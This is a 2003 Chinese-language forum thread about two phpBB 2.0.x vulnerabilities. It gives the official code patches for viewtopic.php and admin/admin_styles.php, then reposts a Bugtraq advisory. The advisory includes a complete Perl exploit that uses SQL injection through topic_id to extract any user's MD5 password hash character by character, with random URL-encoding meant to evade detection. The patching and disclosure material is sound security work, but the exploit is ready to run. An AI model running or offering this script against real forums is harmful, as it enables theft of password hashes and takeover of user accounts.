修正phpBB 2.0.x两个安全漏洞

hutuworm · 发表于 2003-6-29 13:36:49

phpBB开发组最近公布了phpBB 2.0.x两个安全漏洞的修正办法：

1. SQL注射漏洞：
修改viewtopic.php。在
[code:1]if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
{
$topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
else if ( isset($HTTP_GET_VARS['topic']) )
{
$topic_id = intval($HTTP_GET_VARS['topic']);
} [/code:1]
之前加入：
[code:1]$topic_id = $post_id = false; [/code:1]

将以下代码：

[code:1]$join_sql_table = ( !isset($post_id) ) ? '' : ", " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2 ";
$join_sql = ( !isset($post_id) ) ? "t.topic_id = $topic_id" : "p.post_id = $post_id AND t.topic_id = p.topic_id AND p2.topic_id = p.topic_id AND p2.post_id <= $post_id";
$count_sql = ( !isset($post_id) ) ? '' : ", COUNT(p2.post_id) AS prev_posts";

$order_sql = ( !isset($post_id) ) ? '' : "GROUP BY p.post_id, t.topic_id, t.topic_title, t.topic_status, t.topic_replies, t.topic_time, t.topic_type, t.topic_vote, t.topic_last_post_id, f.forum_name, f.forum_status, f.forum_id, f.auth_view, f.auth_read, f.auth_post, f.auth_reply, f.auth_edit, f.auth_delete, f.auth_sticky, f.auth_announce, f.auth_pollcreate, f.auth_vote, f.auth_attachments ORDER BY p.post_id ASC"; [/code:1]
替换为：

[code:1]$join_sql_table = ( empty($post_id) ) ? '' : ", " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2 ";
$join_sql = ( empty($post_id) ) ? "t.topic_id = $topic_id" : "p.post_id = $post_id AND t.topic_id = p.topic_id AND p2.topic_id = p.topic_id AND p2.post_id <= $post_id";
$count_sql = ( empty($post_id) ) ? '' : ", COUNT(p2.post_id) AS prev_posts";

$order_sql = ( empty($post_id) ) ? '' : "GROUP BY p.post_id, t.topic_id, t.topic_title, t.topic_status, t.topic_replies, t.topic_time, t.topic_type, t.topic_vote, t.topic_last_post_id, f.forum_name, f.forum_status, f.forum_id, f.auth_view, f.auth_read, f.auth_post, f.auth_reply, f.auth_edit, f.auth_delete, f.auth_sticky, f.auth_announce, f.auth_pollcreate, f.auth_vote, f.auth_attachments ORDER BY p.post_id ASC"; [/code:1]

2. styles_admin 越界访问漏洞：
修改admin/admin_styles.php。
将以下代码：

[code:1]//
// Load default header
//
//
// Check if the user has cancled a confirmation message.
//
$phpbb_root_path = "./../";

$confirm = ( isset($HTTP_POST_VARS['confirm']) ) ? TRUE : FALSE;
$cancel = ( isset($HTTP_POST_VARS['cancel']) ) ? TRUE : FALSE;

if (empty($HTTP_POST_VARS['send_file']))
{
$no_page_header = ( $cancel ) ? TRUE : FALSE;
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);
}

if ($cancel)
{
redirect('admin/' . append_sid("admin_styles.$phpEx", true));
} [/code:1]
替换为：
[code:1]//
// Load default header
//
//
// Check if the user has cancled a confirmation message.
//
$phpbb_root_path = "./../";
require($phpbb_root_path . 'extension.inc');

$confirm = ( isset($HTTP_POST_VARS['confirm']) ) ? TRUE : FALSE;
$cancel = ( isset($HTTP_POST_VARS['cancel']) ) ? TRUE : FALSE;

$no_page_header = (!empty($HTTP_POST_VARS['send_file']) || $cancel) ? TRUE : FALSE;

require('./pagestart.' . $phpEx);

if ($cancel)
{
redirect('admin/' . append_sid("admin_styles.$phpEx", true));
} [/code:1]

用户也可直接升级到phpBB 2.0.5。（hutuworm编译）

hutuworm · 发表于 2003-7-1 10:50:27

phpBB viewtopic.php SQL注入漏洞

发布日期：2003-06-20
更新日期：2003-06-27

受影响系统：
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 7979

phpBB是一款基于WEB的流行的论坛程序。

phpBB包含的viewtopic.php脚本不正确处理用户提交的请求，远程攻击者可以利用这个漏洞通过SQL注入攻击窃取用户敏感数据，或破坏数据库。

在调用viewtopic.php时，直接从GET请求中获得"topic_id"并传递给SQL查询命令中，因此，攻击者可以提交特殊的SQL字符串用于获得MD5密码，获得此密码信息可以用于自动登录或者进行暴力破解。

<*来源：Rick （[email protected]）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105607263130644&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Rick （[email protected]）提供了如下测试方法：

#!/usr/bin/perl -w
#
#
# phpBB password disclosure vuln.
# - rick patel ([email protected]) -
#
# There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id
# which gets passed directly to sql server in query. Attacker could pass a special sql string which
# can used to see md5 password hash for any user (!) for phpBB. This pass can be later used with
# autologin or cracked using john.
#
# Details:
#
# this is checking done for $topic_id in viewtopic.php:
#
# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
# {
# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
# }
# else if ( isset($HTTP_GET_VARS['topic']) )
# {
# $topic_id = intval($HTTP_GET_VARS['topic']);
# }
#
# ok... no else statement at end
# now if GET[view]=newest and GET[sid] is set, this query gets executed:
#
# $sql = "SELECT p.post_id
# FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
# WHERE s.session_id = '$session_id'
# AND u.uid = s.session_user_id
# AND p.topic_id = $topic_id
# AND p.post_time >= u.user_lastvisit
# ORDER BY p.post_time ASC
# LIMIT 1";
#
# Ahh! $topic_id gets passed directy to query. So how can we use this to do something important? Well
# I decided to use union and create a second query will get us something useful. There were couple of
# problems i ran into. first, phpBB only cares about the first row returned. second, the select for first
# query is p.post_id which is int, so int becomes the type returned for any other query in union. third,
# there is rest of junk at end " AND p.post_time >= ..." We tell mysql to ignore that by placing /* at end
# of our injected query. So what query can we make that returns only int?
# this one => select ord(substring(pass,$index,1)) from phpbb_users where uid = $uid
# Then all we have to do is query 32 times which $index from 1-32 and we get ord value of all chars of
# md5 hash password.
#
# I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support unions so you would have to tweak
# the query to do anything useful.
#
# This script is for educational purpose only. Please dont use it to do anything else.
#

use IO::Socket;

$remote = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;

$dbtype = 'mysql4'; # mysql4 or pgsql

print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

for($index=1; $index<=32; $index++)
{
$socket = IO::Socket::INET->new(PeerAddr => $remote,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "Couldnt connect to $remote:$port : $@\n";
$str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0\n\n";

print $socket $str;
print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it
print $socket "Host: $remote\n\n";

while ($answer = <$socket>)
{
if ($answer =~ /Location:.*\x23(\d+)/) # Matches the Location: viewtopic.php?p=<num>#<num>
{
$p .= chr ($1);
}
}

close($socket);
}

print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = "";
for($i=0; $i<length($str); $i++)
{
$c = substr($str,$i,1);
$j = rand length($str) * 1000;

if (int($j) % 2 || $c eq ' ')
{
$ret .= "%" . sprintf("%x",ord($c));
}
else
{
$ret .= $c;
}
}
return $ret;
}

sub make_dbsql
{
if ($dbtype eq 'mysql4')
{
return " union select ord(substring(pass," . $index . ",1)) from phpbb_users where uid=$uid/*" ;
} elsif ($dbtype eq 'pgsql')
{
return "; select ascii(substring(pass from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.uid=$uid or false";
}
else
{
return "";
}
}

jackey · 发表于 2003-7-2 21:20:43

cool, gj.

		自动登录	找回密码
密码			注册